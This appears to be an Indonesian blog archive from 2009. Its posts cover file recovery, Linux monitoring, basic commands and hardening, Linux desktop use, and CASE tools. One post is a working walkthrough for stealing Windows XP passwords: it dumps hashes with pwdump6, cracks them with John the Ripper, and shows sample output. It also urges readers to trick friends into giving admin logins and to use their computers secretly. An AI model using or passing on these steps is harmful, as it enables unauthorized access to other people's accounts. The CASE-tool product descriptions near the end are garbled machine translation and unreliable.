Rabu, 30 Desember 2009

Cara Mengembalikan Data yang Hilang atau Terformat

Anda Pernah kehilangan data yang berharga atau yang penting?gak usah bingung -bingung untuk mengembalikannya. Restoration File salah satunya. Cara yang termudah untuk melakukan pengembalian data-data yang hilang bisa menggunakan software yang bisa me-restore file-file yang telah di hapus baik yang melalui recycle bin maupun langsung dari windows. Software tersebut juga bisa melakukan recover untuk foto-foto dari flash card yang terformat.

Hal pertama yang dilakukan dari software ini adalah mencari data-data yang telah dihapus dari user dalam partisi harddisk tertentu. Jadi sebaiknya software ini ditaruh dimasing-masin partisi harddisk baik harddisk berformat NTFS maupun FAT.


Untuk menjalankan program ini diperlukan authorities user sebagai administrator dengan cara mengklik kanan restoration file application dan klik "Run as Administrator". Dan juga freeware ini tidak memerlukan penginstallan dalam menjalankan program tersebut dan juga software ini beroperasi sendiri/standalone. Inilah alasan mengapa direkomendasikan untuk menaruh restoration file di setiap partisi harddisk.

Kekurangan dalam freeware ini adalah mempunyai kapasitas recovery capabilities yang limited sehingga tidak semua file dapat di restore. Dan juga tampilan dari software ini pun kurang menarik. Tetapi cukup simpel untuk dimengerti.

Sumber :www.beritanet.com

Read More..

Selasa, 29 Desember 2009

Hack Windows XP (SP2) Passwords

Apakah anda pernah menggunakan komputer di Lab atau pinjam komputer teman atau bahkan menggunakan komputer di tempat umum? Nah, biasanya klo di Lab (berdasarkan pengalaman pribadi) komputer pasti di-password dan jika ingin masuk harus tanya dulu ke sang empunya. Nah, sekarang kita dapat melihat password dari komputer yang kita gunakan tanpa merestart komputer atau pun tanpa menginstall program apapun seperti Cain, L0pthCrack, dsb. Hanya dibutuhkan sedikit ‘kepercayaan’ untuk meminjam komputer (istilah kerennya social engineering) dan 2 buah program, yaitu pwdump6 dan john the ripper. Tapi klo kebetulan ada login umum dengan tipe administrator, itu namanya Hoki! ga perlu cape2 pinjam login teman lagi


Sebelumnya mungkin anda pernah mendapatkan tutorial mengenai cara menge-hack password user yang ada Windows XP atau NT menggunakan pwdump. Yup, mungkin tutorial ini akan mirip dengan bagaimana cara menge-hack Windows XP, terutama Windows XP SP2. Lalu apa bedanya dengan tutorial yang lain? Saat ini Windows XP SP2 (atau mungkin juga SP1, CMIIW), menggunakan Syskey untuk memproteksi agar HASH (tempat menyimpan password yang dienkripsi) tidak dapat dibaca dan didump menggunakan pwdump atau samdump. Untuk lebih jelasnya berikut penjelasan mengenai Syskey [1] :

Syskey is a Windows feature that adds an additional encryption layer to the password hashes stored in the SAM database. The main purpose of this feature is to deter ‘offline’ attack. In fact one of the most common ways to gather passwords is to copy the system SAM database and then use one of the many good password crackers to “recover” the passwords; of course physical access is almost always required. So with syskey the attacker needs to remove the additional encryption layer to get the password hashes.

Jika dulu mungkin di Windows NT atau XP (sebelum SP2), kita masih bisa menggunakan pwdump atau bahkan langsung dengan KaHT, maka untuk Windows XP SP2 cara tersebut tidak dapat digunakan lagi (mungkin lebih tepatnya, pwdump tersebut tidak dapat digunakan lagi). Nah disinilah letak perbedaan dengan tutorial sebelumnya. Jika sebelumnya kita menggunakan pwdump versi lama, maka sekarang digunakan pwdump6 yang dikembangkan oleh fizzgig and the foofus.net Team. Kalau baca README dari pwdump6 ini, maka pwdump6 adalah :

pwdump6 is a password hash dumper for Windows 2000 and later systems. It is capable of dumping LanMan and NTLM hashes as well as password hash histories. It is based on pwdump3e, and should be stable on XP SP2 and 2K3. If you have had LSASS crash on you using older tools, this should fix that.

A significantly modified version of pwdump3e, this program is able to extract NTLM and LanMan hashes from a Windows target, regardless of whether Syskey is turned on. It is also capable of displaying password histories if they are available. It outputs the data in L0phtcrack-compatible form, and can write to an output file

Oh iya, agar pwdumpd6 dapat dijalankan dan mendapatkan HASH file dibutuhkan account yang mempunyai akses setara dengan Administrator. Nah, oleh karena itu kita harus menjalankan sedikit social engineering. Bilang aja ketemen kita, klo mengakses workgroup, tapi ga bisa klo pake login biasa. Tapi tenang aja, biasanya secara default orang-orang kebanyakan mebuat user dengan tipe account Administrator. Atau gunakan berbagai macam cara, daya, upaya maupun rayuan agar kita bisa dapat login terlebih dulu.

Jika udah punya akses dengan login tipe adiministrator, cara selanjutnya adalah tinggal menjalankan pwdump6. Jika anda punya flashdisk, simpan dan bawa terus pwdump6 ini kemanapun ada pergi, siapa tahu berguna suatu saat.. :-D. Ok, langsung aja kita jalankan pwdump6 ini. Sebaiknya copy dulu pwdump6 ke Hardisk (jangan dijalankan dari flashdik). Sebelumnya downlod dulu pwdump6 ini dari sini atau download dari mirror situs saya disini.

1. Jalankan CMD (Run->cmd)

2. Jalankan pwdump6 seperti berikut (misalnya PwDump6 berada di folder D:\PwDump6)

D:\PwDump6>PwDump.exe -o pass.txt 127.0.0.1

pwdump6 Version 1.3.0 by fizzgig and the mighty group at foofus.net
Copyright 2006 foofus.net

This program is free software under the GNU
General Public License Version 2 (GNU GPL), you can redistribute it and/or
modify it under the terms of the GNU GPL, as published by the Free Software
Foundation. NO WARRANTY, EXPRESSED OR IMPLIED, IS GRANTED WITH THIS
PROGRAM. Please see the COPYING file included with this program
and the GNU GPL for further details.

Using pipe {C411BDE9-594E-47F4-99B5-E94ADF194A45}
Key length is 16
Completed.

3. Setelah itu akan didapatkan file pass.txt yang berisi daftar user dan password yang masih dienkripsi. Contohnya akan tampak seperti berikut :

ach:1003:2BFA42D08601B951ABD697149E2F5967:73098347042E9109FA584CE843018F4F:::
Administrator:500:934A4750EC9859B3EA397B0F6EC18E34:732BD09D6834DA4A5A30300A6A045BF8:::
coba:1004:FBE4F28EE205F0BA79999C25263AA9AA:A69C199A4DF77CD41FCA6EA916A93868:::
Guest:501:NO PASSWORD********************* :NO PASSWORD*********************:::
HelpAssistant:1000:B3D2AE56C93F27B43C4F8419B1A21E9B: DC3DBB258A10B0C7EA9D92133267B905:::
SUPPORT_388945a0:1002:NO PASSWORD*********************: DF1DB672DA1B5C045ECA2490CA753D3B:::

4. Yosh!! password sudah ditangan. Proses selanjutnya adalah menge-crack file pass.txt dengan bantuan John The Ripper. Sebaiknya simpan dulu file pass.txt ke USB atau upload ke tempat yang aman, karena proses cracking ini bisa dilakukan kapan saja dan dimana saja. Berdasarkan pengalaman, kalau passwordnya tidak terlalu sulit ditebak seperti “adminkeren”, “qwerty123″, biasanya dibutuhkan waktu yang tidak terlalu lama untuk mengecracknya lewat John The Ripper. Tapi kalau password menggunakan kombinasi yang aneh-aneh seperti “P4ssW0rD”, “S03S4h”, dsb, biasanya membutuhkan waktu lama, bisa ditinggal tidur atau maen aja dulu. Ok, sekarang gini nih cara ngecraknya.

Download John The Ripper untuk Windows disini. Untuk komputer yang menggunakan Prosesor AMD, sebaiknya menggunakan “john-mmx.exe”. Atau bagi yang menggunakan intel atau AMD, dapat menggunakan “John-386.exe”. Sebelumnya copy file pass.txt ke dalam folder tempat “John-mmx.exe” atau “John-386.exe” berada (John171w\john1701\run). Setelah itu tinggal jalankan perintah berikut dan tunggu dengan sabar :

D:\john171w\john1701\run>john-mmx.exe pass.txt
Loaded 8 password hashes with no different salts (NT LM DES [64/64 BS MMX])
REN123 (Administrator:2)
TEBAK (coba:2)
ADMINKE (Administrator:1)
MUDAHDI (coba:1)

Yosh!! sekarang passwordnya sudah terlihat secara kasat mata. Jadi password untuk user “Administrator” adalah “adminkeren123″, diperoleh dari menggabungkan Administrator:2 dan Administrator:2.

Administrator:1+Administrator:2 = adminkeren123

Sedangkan untuk user “coba” adalah “mudahditebak”!!

Mudah bukan? Intinya sih tinggal ambil HASH file (password yang dienkripsi) menggunakan pwdump6 lalu crack hasilnya dengan John The Ripper.

Nah, sekarang kalau kita mau pakai komputer teman di Lab, ga usah cari2 orangnnya lagi. Tinggal pake aja langsung user Admin lagi, tapi jangan sampai ketahuan ama dia….. Atau klo anda lupa password Administrator, tidak perlu mereboot komputer, lalu mereset password anda. Tinggal ikut langkah2 diatas aja!


Read More..

Jumat, 18 Desember 2009

Bagaimana memonitor sistem Linux

Menganalisis sistem biasanya dilakukan oleh seorang administrator sistem untuk mendeteksi adanya gejala-gejala yang dapat menyebabkan kerusakan atau masalah pada sistem kelak. RedHat sudah menyediakan tool-tool untuk melakukan hal itu, diantaranya adalah dua buah program tool yang sangat berguna yaitu vmstat dan top, dengan menggunakan kedua program tersebut administrator memperoleh informasi mengenai sistem seperti penggunaan CPU, memori atau proses-proses yang sedang berjalan dan dengan bantuan informasi ini administrator sistem bisa mendeteksi secara cepat apakah sistemnya mengalami gangguan atau tidak.Dengan menggunakan kedua program tersebut, Anda sendiri bisa mencoba dan melihat apakah sistem yang dipakai saat ini berjalan dengan baik atau tidak. Lihatlah informasi yang ditampilkan program-program tersebut dan bila Anda memperkirakan ada masalah, silakan menghubungi administrator sistem untuk mendapatkan bantuan.


vmstat
Program atau perintah ini akan melakukan test dan menampilkan informasi penggunaan CPU, memori, proses-proses yang sedang berjalan serta operasi I/O. Sintaks penulisan perintahnya adalah sebagai berikut:

$ vmstat [interval] [count]

Interval adalah waktu jeda test dalam detik dan count adalah jumlah test yang kita kehendaki. Misalnya akan dilakukan test sebanyak 5 kali dengan waktu jeda setiap 5 detik maka perintah dan hasilnya adalah seperti dibawah ini:

[zakaria@linux source]$ vmstat 5 5
procs memory swap io system cpu
r b w swpd free buff cache si so bi bo in cs us sy id
0 0 0 37924 824 840 13280 54 14 30 9 522 271 21 6 73
3 0 0 37924 1080 816 13060 0 0 1 0 110 329 20 16 64
1 0 0 37924 1036 824 13084 0 0 2 1 130 331 18 18 64
1 0 0 37924 1036 824 13084 0 0 0 0 107 329 19 16 65
2 0 0 37924 1036 828 13084 0 0 0 1 112 326 21 14 65

Tiga kolom pertama menunjukkan proses-proses yang sedang dikerjakan, yaitu waiting for runtime(r), uninterupted sleep(b) dan swapped out(w). Banyaknya proses yang mengalami waiting for runtime(r) dapat merupakan indikasi terjadinya suatu masalah misalnya telah terjadi bottleneck yaitu penumpukan proses-proses disuatu tempat.

Kolom memory dan swap digunakan untuk mendeteksi adanya kesalahan yang ditimbulkan oleh manajemen memori. Kolom-kolom swpd, free, buff dan cache berturut-turut menjelaskan jumlah memori virtual yang digunakan, jumlah memori idle, jumlah memori yang dipakai sebagai buffer dan jumlah memori yang tersisa dalam cache, semuanya dalam KB. Perhatikan kolom swap in(si), merupakan jumlah memori yang di-paging dari disk dalam satuan KB/detik sedangkan swap out(so) adalah kebalikannya.

Tiga kolom terakhir adalah persentasi penggunaan CPU yaitu persentasi penggunaan CPU untuk tugas-tugas user(us), persentasi penggunaan CPU untuk tugas-tugas sistem termasuk waktu tunggu I/O, pelaksanaan fungsi-fungsi sistem operasi secara umum(sy) dan persentasi CPU idle atau saat tidak digunakan(id). Untuk mendeteksi suatu kesalahan yang diakibatkan oleh masalah CPU sebaiknya dengan melihat persentasinya secara signifikan dalam satu periode waktu. Misalnya pada saat komputer idle dalam satu periode waktu, perhatikan kolom us dan sy seharusnya menunjukkan angka yang rendah sedangkan kolom id menunjukkan angka yang tinggi. Bila tidak seperti itu maka dipastikan ada masalah yang berkaitan dengan CPU.

top
Menampilkan informasi proses yang sedang dilakukan CPU secara real time. Kelebihan dari top ini adalah kita dapat memanipulasi proses-proses tersebut secara interaktif dengan menekan tombol-tombol menu. Misalnya untuk meng-kill sebuah proses, kita cukup menekan tombol K dan mengisi nomor proses(PID) yang ingin di-kill.

Untuk menjalankannya cukup dengan mengetikkan perintah top dan segera ditampilkan daftar proses-proses yang sedang berjalan saat itu berikut informasi-informasi lainnya. Informasi-informasi yang ditampilkan tersebut secara default akan diperbarui atau diupdate setiap 5 detik. Berikut ini tampilan sebagian dari daftar proses-proses yang ditunjukkan oleh top:


Baris-baris header menampilkan informasi mengenai waktu, jumlah user, banyaknya proses, penggunaan CPU serta memori secara jelas. Misalnya saat itu sistem memiliki 35 buah proses, dimana 4 proses sedang berjalan, 30 proses sleeping dan ada sebuah proses menjadi zombie. Porses zombie ini adalah sebuah proses yang hang atau hidup segan, mati tak mau (Ronny Haryanto, giant@canada.com) dan apabila Anda tidak bisa mem-kill proses zombie ini maka parent process-nya harus di-kill lebih dahulu. Gunakan perintah pstree atau ps ufx untuk mengurut proses mana yang menjadi parent dari zombie tersebut.

Daftar menu untuk mengoperasikan top dapat dilihat dengan menekan tombol ?, atau h. Dengan menggunakan tombol-tombol dalam daftar menu tersebut, kita dapat melakukan manipulasi semua proses dalam sistem. Misalnya, tombol k untuk meng-kill sebuah proses, tombol r untuk me-renice proses dan q untuk keluar atau mengakhiri progam top.
Read More..

Rabu, 16 Desember 2009

Basic Command / Perintah Dasar dalam Linux

Berbekal dengan Howto yang kamu cetak, kamu telah berhasil menginstall Distro pertamamu dengan mulus. Jika kamu menginstall X-Windows, maka kamu akan memiliki pilihan-pilihan untuk mengklik icon-icon yang ada dan mencoba mengetahui apa fungsi dari icon-icon tersebut. Namun bagaimana jika kamu tidak menginstall X-Windows? Kamu akan dihadapkan dengan prompt untuk login.

"Apa yang harus saya lakukan setelah login di Linux?"
"Bagaimana untuk melihat isi harddisk di dalam Linux?"Pertanyaan-pertanyaan di atas adalah pertanyaan yang mungkin paling sering ditanyakan oleh para newbie setelah mereka berhasil menginstall Linux. Oleh karena itu, artikel ini bertujuan untuk membantu kamu untuk memulai petualangan Linuxmu yang pertama.

Perintah Linux beserta kegunaannya

cd x atau cd /x == masuk ke direktori x
cd .. atau cd ../ atau cd/.. == pindah ke direktori satu level di bawah
x lalu [tab] [tab] == berguna untuk mengetahui perintah apa saja yang tersedia yang berawalan huruf x
adduser == untuk menambahkan user baru
ls atau dir == untuk melihat isi suatu direktori
cat == untuk melihat isi dari suatu file text
mv x y == untuk memindahkan atau merename file x ke file y
cp x y == untuk mengkopi file x ke file y
rm x == untuk menghapus file x
mkdir x == untuk membuat direktori x
rmdir x == untuk menghapus direktori x
rm -r x == untuk menghapus direktori x beserta seluruh isinya
rm p == untuk menghapus paket tertentu
df atau df x == untuk mengetahui space kosong dalam device x
top == untuk mengetahui status memori (tekan q untuk quit)
man x == untuk mengetahui keterangan manual dari suatu perintah
less x == untuk melihat isi dari suatu file text
echo x == untuk mencetak isi dari suatu file x ke screen
mc == untuk menghidupkan Norton Commander dalam Linux (sangat berguna dan memudahkan bagi newbie)
mount == untuk menghidupkan suatu device spt cdrom
halt == untuk shutdown
reboot atau [ctl + alt + del] == untuk reboot


chmod == untuk mengubah permission suatu file
ls -l x == untuk melihat isi suatu direktori secara rinci
ln -s x y == untuk membuat link dari suatu file x ke file y
find x -name y -print == untuk menemukan file y, dengan mencari mulai dari direktori x dan tampilkan hasilnya pada layar
ps == untuk melihat seluruh proses yang sedang berjalan
kill x == untuk mematikan proses x (x adalah PID di dalam ps)
[alt] + F1 - F7 == untuk berpindah dari terminal 1 - 7 (ciri khas Linux)
lilo == untuk membuat boot disk


startx == untuk menjalankan X-Windows
[ctl] + [alt] + [backspace] == untuk keluar dari X-Windows jika terjadi trouble
[ctl] + [alt] + F1 - F6 == untuk pindah dari satu terminal ke terminal lain dalam X-Windows
xf86Config == untuk mengeset X (primitif) dalam text mode
Xconfigurator == sama seperti di atas



Read More..

Bekerja dengan Linux

Mungkin kita familiar dengan kata-kata Linux, Unix, RedHat, SuSe, Slackware dan sebagainya yang sekarang ini sering kita dengar kalau kita berbicara masalah Teknologi Informasi terutama Teknologi Internet. Kata-kata tersebut mungkin terkesan "wah" atau esklusif bagi orang-orang yang memang belum mengetahuinya. Apalagi terutama kalau kebetulan teman kita menguasai salah satu dari "kata-kata" diatas. Kita mungkin terkagum-kagum dengan teman kita itu, "wah jago bener nih.." itu mungkin yang sering terlintas dalam pikiran kita.
Apa bener teman kita itu jago banget :) atau kita-nya yang males belajar sesuatu yang bisa dibilang tidak baru juga. Sebelum kita kategorikan Linux, kita coba cari tahu makhluk apakah yang namanya Linux itu?.Secara garis besar Linux adalah sebuah sistem operasi komputer, yg sebelumnya kita mungkin sering pakai sistem operasi bernama windows, dos, mac dab sebagainya. Saya disini tidak ingin berbicara panjang lebar tentang Linuxnya, sudah banyak tulisan yg membahas tentang Linuxnya itu sendiri.

Linuxnya itu sendiri berbagai macam distronya. Distro?, Apakah distro itu?. Distro bisa kita sebut paket atau pemaketan, karena inti dari masing2x Linux (kernel) dari masing2x distro itu adalah sama, yang berbeda adalah cara atau bagaimana pemaketannya.
Banyak ragamnya distro Linux, diantaranya Red Hat, SuSe, Slackware, Mandrake, Debian juga tidak ketinggalan distro produk dalam negeri kita sendiri, seperti Trustik Merdeka, Software RI dan sebagainya. (Untuk pembahasan distro dalam negeri sudah dibahas di edisi sebelumnya).

Untuk mudahnya kita bagi dua kategori pemakain Linux, yaitu sebagai Server dan sebagai Wokstation. Mungkin ada juga yg menambahkan kategori Linux sebagai Mobile OS (karena Linux bisa diinstall di Ponsel, PDA dan juga Notebook).

Linux sebagai Server
Linux sebagai server sudah banyak kita dengar, karena rata2x kalau kita mendengar kata Linux maka identik dengan server. Memang tidak ada salahnya, karena sebagian besar server Internet yg dipergunakan sebagai Web Server berbasiskan Linux. Kenapa? Kenapa sebagian besar orang memilih Linux sebagai Web Server?. Mungkin akan kita bahas lain kali.
Untuk sekarang kita membahas Linux sebagai Workstation

Linux sebagai Workstation
Kalau kita melihat tema paragrap diatas, Linux sebagai Workstation, diantara kita pasti ada yg menjawab "Mana mungkinnnnnn....!!!!" :) Ya jawaban seperti itu tidak aneh kalau kita dengar dan bagi orang2x yang belum mengenal begitu jauh tentang Linux. Kalau saya bilang bekerja dengan Linux -dalam arti sebagai workstation -adalah mungkin sekali. Semua aplikasi yang biasa kita pergunakan - di sistem operasi lain -sehari hari, kebanyakan sudah ada versi Linuxnya. Yang membedakan mungkin vendor pembuatnya, dan yang asyiknya adalah kebanyakan berlisensii GPL (General Public License) alias GRATIS!!! untuk di download dan dicoopy ulang..

Sekarang kita lihat aplikasi-aplikasi apa yang -menyentuh -kehidupan kita sehari hari:
Aplikasi Office seperti pengolah kata, pengolah tabel, modul presentasi, dan lain-lainnya
Sudah ada semua dalam Linux yaitu Star Office atau juga Open Office yang juga bisa kita download gratis tanpa takut disebut pembajak :)
Oh iya, jangan takut.. semua ini adanya dalam modus grafik bukan dalam modus teks. Seperti yang kita ketahui ada beberapa diantara kita yang beranggapan bahwa Linux itu isinya teks semua. Anggapan tersebut tidak sepenuhnya keliru, karena kalau kita pergunakan Linux sebagai Server kita tidak butuh modus grafiknya. Tetapi untuk workstation pasti kita butuhkan modus grafik, yang bisa kita pasang saat penginstallannya. Modus grafik itu biasa disebut X Windows
Aplikasi lain seperti aplikasi2x internet, email reader, web browser, dial up connection banyak macamnya di Linux missal Kmail dan Ximian untuk email client/reader, Konqueror, Mozilla, Netscape, Opera untuk web browser.
Memutar video ? mp3 ? jangan khawatir kita bisa menginstall XMMS mp3 player, Xine untuk vcd player bahkan real player (salah satu aplikasi untuk memutar live streaming) sudah ada dalam beberapa distro yang ada. Dan itu semua Anda dapat temukan dalam CD installer Linux.

Bekerja dengan linux
Dari penjelasan diatas rasa-rasanya tidak ada yang menahan kita untuk berpindah menggunakan Linux sebagai "teman kerja" Anda. Apapun profesi Anda Linux siap menunjang Anda dengan aplikasi2xnya yang sudah mulai dikembangkan oleh vendor2x besar, seperti Star Office oleh Sun, Corel Photopaint oleh Corel Inc.
Pasti akan timbul pertanyaan, "Gimana nih, saya khan biasa ngedesain gambar memanipulasi image dan sebagainya termasuk ngerender 3D.. kalau aplikasi2x gitu ajah sih.. paling cuman sekretaris yang pake...!!!" He hehehe.. jangan khawatir untuk Anda para yang bersuara seperti diatas ada pemecahannya. Kita bisa pakai The Gimp untuk mengolah gambar selain itu kita juga bisa menggunakan Corel Photopaint. Untuk aplikasi 3D kita bisa gunakan Maya.
Dan semuanya itu bisa kita download dari internet secara gratis tanpa melanggar hak cipta.

Sebagai gambaran, penulis yang sehari2xnya bekerja sebagai Web Developer mau tidak mau pasti berhubungan dengan yang namanya pengolahan gambar, teks editor dan sebagainya. Memang pada mulanya butuh penyesuaian, tetapi kita kan bisa karena biasa.
Penulis sendiri menggunakan distro SuSe 8.0, KDE untuk modus grafiknya, The Gimp untuk pengolahan gambarnya, dan KATE untuk teks editornya serta Star Office untuk aplikasi Officenya.

Beralih ke Linux
So.... Tunggu apa lagi ? kenapa kita ragu2x untuk berpindah ke Linux?. Butuh support ? di Indonesia sendiri sudah mulai banyak kelompok2x penggemar Linux yang tergabung dalam KPLI yang tersebar dari sabang sampai merauke, Yayasan Linux Indonesia, dan sebagainya.
Butuh support cepat ? tinggak connect ke internet dan buka aplikasi Internet Relay Chat (di Linux ada Kvirc atau BitchX) dan join dengan network dal.net dan gabung dengan channel #indolinux.. :) disitu tempat anak2x "maniak" Linux "nongkrong". Ada kesulitan? Jangan segan2x bertanya, karena pasti dijawab oleh salah satu dari mereka, bahkan Andapun bisa "nongkrong" di channel tersebut untuk hanya sekedar ngobrol sana sini tentang Linux... :)
Pakai Linux??? Siapa takuttttt............................ :)

Bi[G]
Ady Permadi, IT Profesional yang bekerja dengan Linux

Artikel ini dedikasikan untuk para Linuxers yang sering "nongkrong" di channel #indolinux dal.net (sekarang efnet.net) yang tidak bisa disebutkan satu persatu.

Contoh screenshots:
http://www.arinet.org/download/mydesktop_with_dual_monitor.jpg
http://www.arinet.org/download/ximian_evolution_email_client.png
http://www.arinet.org/download/ximian_evolution_email_client_default.png
Read More..

Jumat, 11 Desember 2009

Basic security di Linux

Sebuah server linux yang aman tergantung bagaimana administrator membuat server tersebut. Berikut ini akan dijelaskan hal-hal yang berkaitan dengan masalah keamanan.i) Keamanan BIOS
Berilah boot password pada BIOS anda, karena orang lain bisa saja mem-boot system anda dengan menggunakan boot disk khusus.
ii) Set-lah panjang minimum password bagi user agar sulit untuk ditebak.
Kita bisa melakukan hal ini dengan cara mengedit file /etc/login.defs. Contoh:

vi /etc/login.defs
Editlah baris PASS_MIN_LEN 5
menjadi PASS_MIN_LEN 8
iii) Untuk alasan keamanan, jangan pernah login sebagai root kecuali memang sedang membutuhkan akses root. Dan jangan pernah meninggalkan login root begitu saja dari komputer kita tanpa logout terlebih dahulu.


iv) Mengeset login time out untuk account root
Editlah file /etc/profile dan tambahkan baris TMOUT setelah baris HISTSIZE. Contoh:
vi /etc/profile
tambahkan baris berikut:
TMOUT=7200
v) Disable servis-servis yang ada pada /etc/inetd.conf
vi /etc/inetd.conf
matikanlah servis-servis yang masih terbuka pada /etc/inetd.conf dengan memberikan tanda #. Sehingga file /etc/inetd.conf akan menjadi seperti:
# To re-read this file after changes, just do a 'killall -HUP inetd’
#
#echo stream tcp nowait root internal
#echo dgram udp wait root internal
#discard stream tcp nowait root internal
#discard dgram udp wait root internal
#daytime stream tcp nowait root internal
#daytime dgram udp wait root internal
#chargen stream tcp nowait root internal
#chargen dgram udp wait root internal
#time stream tcp nowait root internal
#time dgram udp wait root internal
#
# These are standard services.
#
#ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd -l -a
#telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd
#
# Shell, login, exec, comsat and talk are BSD protocols.
#
#shell stream tcp nowait root /usr/sbin/tcpd in.rshd
#login stream tcp nowait root /usr/sbin/tcpd in.rlogind
#exec stream tcp nowait root /usr/sbin/tcpd in.rexecd
#comsat dgram udp wait root /usr/sbin/tcpd in.comsat
#talk dgram udp wait root /usr/sbin/tcpd in.talkd
#ntalk dgram udp wait root /usr/sbin/tcpd in.ntalkd
#dtalk stream tcp wait nobody /usr/sbin/tcpd in.dtalkd
#
# Pop and imap mail services et al
#
#pop-2 stream tcp nowait root /usr/sbin/tcpd ipop2d
#pop-3 stream tcp nowait root /usr/sbin/tcpd ipop3d
#imap stream tcp nowait root /usr/sbin/tcpd imapd
#
# The Internet UUCP service.
#
#uucp stream tcp nowait uucp /usr/sbin/tcpd /usr/lib/uucp/uucico -l
#
# Tftp service is provided primarily for booting. Most sites
# run this only on machines acting as "boot servers." Do not uncomment
# this unless you *need* it.
#
#tftp dgram udp wait root /usr/sbin/tcpd in.tftpd
#bootps dgram udp wait root /usr/sbin/tcpd bootpd
#
# Finger, systat and netstat give out user information which may be
# valuable to potential "system crackers." Many sites choose to disable
# some or all of these services to improve security.
#
#finger stream tcp nowait root /usr/sbin/tcpd in.fingerd
#cfinger stream tcp nowait root /usr/sbin/tcpd in.cfingerd
#systat stream tcp nowait guest /usr/sbin/tcpd /bin/ps -auwwx
#netstat stream tcp nowait guest /usr/sbin/tcpd /bin/netstat -f inet
#
# Authentication
#
#auth stream tcp nowait nobody /usr/sbin/in.identd in.identd -l -e -o
#
# End of inetd.conf

Setelah itu restartlah inetd anda dengan mengetikkan perintah:
killall -HUP inetd
Setelah direstart, buatlah file /etc/inetd.conf immutable sehingga tidak akan dapat dimodifikasi atau direname.
chattr +i /etc/inetd.conf
vi) Pemanfaatan TCP_WRAPPERS
Dengan TCP_WRAPPERS kita dapat dengan mudah menolak atau mengijinkan user-user yang akan mengakses komputer kita.
• Edit file /etc/hosts.deny (vi /etc/hosts.deny) sehingga menjadi:
# Deny access to everyone.
ALL: ALL@ALL, PARANOID
Perintah di atas akan membuat semua servis dan semua lokasi ditolak secara default kecuali diijinkan melalui pendefinisian di hosts.allow.
• Edit file /etc/hosts.allow (vi /etc/hosts.allow) sehingga host-host yang kita percayai dapat mengakses komputer kita. Contoh:
sshd: 203.132.134.123 testing.com
Maksud dari baris di atas adalah TCP_WRAPPERS mengijinkan akses ssh melalui IP 203.132.134.123 dan atau dari host testing.com.
vii) Edit file /etc/securetty, file ini mendefinisikan kebolehan root untuk akses di virtual terminal ke berapa. Contoh:
tty1
#tty2
#tty3
#tty4
#tty5
#tty6
#tty7
#tty8
Konfigurasi di atas akan membuat root hanya bisa login pada tty1 saja.
viii) Edit file /etc/lilo.conf dan tambahkan baris timeout=00, restricted, dan password. Contoh:
boot=/dev/sda
map=/boot/map
install=/boot/boot.b
prompt
timeout=00
Default=linux
restricted
password=
image=/boot/vmlinuz-2.2.12-20
label=linux
initrd=/boot/initrd-2.2.12-10.img
root=/dev/sda6
read-only

Lalu ubahlah mode file tersebut agar hanya root saja yang bisa membaca file tersebut. Ketikkan perintah:
chmod 600 /etc/lilo.conf. Setelah itu, aktifkan kembali lilo dengan setting baru;
lilo
ix) Menghilangkan akses shutdown melalui tombol Ctrl-Alt-Del.
Untuk bisa seperti itu, maka kita harus mengedit file /etc/inittab pada baris:
ca::ctrlaltdel:/sbin/shutdown -t3 -r now
sehingga menjadi:
#ca::ctrlaltdel:/sbin/shutdown -t3 -r now
lalu aktifkan perubahan tersebut dengan perintah:
init q

Sebetulnya masih banyak faktor keamanan lain yang bisa dilakukan. Anda dapat memperolehnya di buku-buku yang membahas tentang security atau dari internet.
Read More..

Rabu, 28 Oktober 2009

Case Tool

* Kepanjangannya Computer-Aided Software Engineering atau Computer-Assisted Software Engineering
*Perangkat lunak yang berguna bagi para pengembang dalam merencanakan, menganalisa, merancang, melakukan pemrograman, dan memelihara sistem sistem informasi
*Tujuan utama CASE dibentuk adalah untuk mengalihkan sejumlah beban yang biasanya dipikul oleh pengembang sistem kepada komputer

ന*

Perangkat CASE yang lengkap mengandung perangkat uppercase dan lowercase


Lowercase
* merupakan perangkat CASE yang berfungsi sebagai pembangkit kode (code generator), yakni menghasilkan kode program berdasarkan suatu spesifikasi rancangan
contoh aplikasi Lowercase

* febooti fileTweak Case 1.1
Ubah file / folder kasus. Anda dapat memodifikasi berkas kasus dengan mengubah ke huruf besar, huruf kecil, Title Case, kasus kalimat, toggle CASE, acak kasus. Ini dapat memproses satu file / folder serta subfolder pohon. Berdiri sendiri anggota (modul) dari febooti fileTweak.

* Batch Zip Toolkit V2.04
Zip batch Toolkit adalah pemenang penghargaan, semua dalam satu file kompresi paket yang memungkinkan Anda untuk kompres dan dekompresi file secara individu - dalam Toolkit Zip Batch batch.Although didasarkan sekitar format Zip yang populer, dalam kenyataan itu benar-benar mendukung 13 format kompresi yang berbeda, termasuk Lha , Gzip, BlakHole, Cab, Tar, Lzh, arj, Ace dan Toolkit Zip Rar.Batch juga dapat memampatkan file Anda secara individual melalui direktori (rekursif) menghemat waktu dan usaha. Jika Anda perlu membuat file extracting diri, menunjukkan Batch Tootkit Zip file Anda ingin mengkonversi dan klik tombol tunggal. Ini benar-benar adalah yang sederhana. File-file ini dapat dibagi di antara teman dan kolega Anda, bahkan jika mereka tidak memiliki Batch t Toolkit Zip terinstall pada Toolkit Zip machine.Batch mereka juga memiliki dibangun di utilitas konversi. Memungkinkan Anda memiliki 10 file dalam format RAR dan anda d ingin mengkonversi mereka ke format Zip, lagi-lagi Anda memilih file yang ingin Anda mengkonversi dan klik tombol 1. Dalam beberapa detik, file Anda akan converted.We juga mengerti bahwa Anda mungkin ingin Batch file Zip yang mungkin memiliki nama file yang tidak teratur, misalnya, jika Anda memiliki file folder penuh dengan kedua huruf besar dan huruf kecil nama-nama file yang tidak seragam , dengan menggunakan fasilitas ganti nama dalam Toolkit Zip Batch, Anda dapat di klik tombol, berganti nama mereka untuk huruf besar atau huruf kecil dalam beberapa detik, terus siap untuk consitent melihat arsip untuk CDR.

* Another Notepad 1.34
Jendela editor teks. Berikut adalah berguna editor teks dengan semua fitur yang nyaman Microsoft kiri keluar dari utilitas Windows Notepad. Hanya beberapa fitur: Urutkan baris teks alfabetis; Convert blok teks untuk semua huruf besar atau huruf kecil; Penggabungan dua file bersama-sama; WordStar perintah kunci; Smart tabs; Auto-lekukan; User-didefinisikan margin; Firman membungkus; Ubah font; load file 16MB.

* Excel change case in multiple cells to u 2.0
